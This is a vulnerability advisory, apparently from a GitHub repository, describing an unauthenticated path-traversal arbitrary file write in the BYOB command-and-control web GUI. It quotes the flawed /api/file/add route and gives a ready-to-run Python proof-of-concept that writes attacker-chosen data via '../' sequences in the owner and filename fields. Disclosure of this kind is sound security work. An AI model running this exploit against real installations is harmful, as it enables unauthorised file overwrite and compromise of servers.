Skip to content

Latest commit

 

History

History
56 lines (39 loc) · 1.91 KB

byob.md

File metadata and controls

56 lines (39 loc) · 1.91 KB

BYOB Arbitrary File Write

The open-source command and control software BYOB suffers from a path traversal vulnerability. An unauthenticated attacker exploiting this vulnerability is able to write files to arbitrary locations.

Vulnerability

The vulnerable code can be found in web-gui/buildyourownbotnet/api/files/routes.py:

@files.route("/api/file/add", methods=["POST"])
def file_add():
    """Upload new exfilrated file."""
    b64_data = request.form.get('data')
    filetype = request.form.get('type')
    owner = request.form.get('owner')
    module = request.form.get('module')
    session = request.form.get('session')
    filename = request.form.get('filename')

    # ...

    output_path = os.path.join(os.getcwd(), 'buildyourownbotnet/output', owner, 'files', filename)

    # ...

    # save exfiltrated file to user directory
    with open(output_path, 'wb') as fp:
        fp.write(data)

    return filename

Accessing this API doesn't require authentication and it allows an attacker to write arbitrary data to an arbitrary location as demonstrated by the following PoC:

#!/usr/bin/env python3
import requests
import base64
import argparse

def exploit(url, data, filename):
    output = requests.post('{}/api/file/add'.format(url), data={'data': base64.b64encode(data), 'type': '', 'owner': '../api/', 'module': '', 'session': '', 'filename': '../../../' + filename}).text
    return output == '../../../' + filename

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Arbitrary file write on BYOB')
    parser.add_argument('url', help='base url of the BYOB installation (e.g. http://localhost/)')
    parser.add_argument('data', help='data to write')
    parser.add_argument('filename', help='file name relative to the web-gui directory')

    args = parser.parse_args()

    print(exploit(args.url, args.data, args.filename))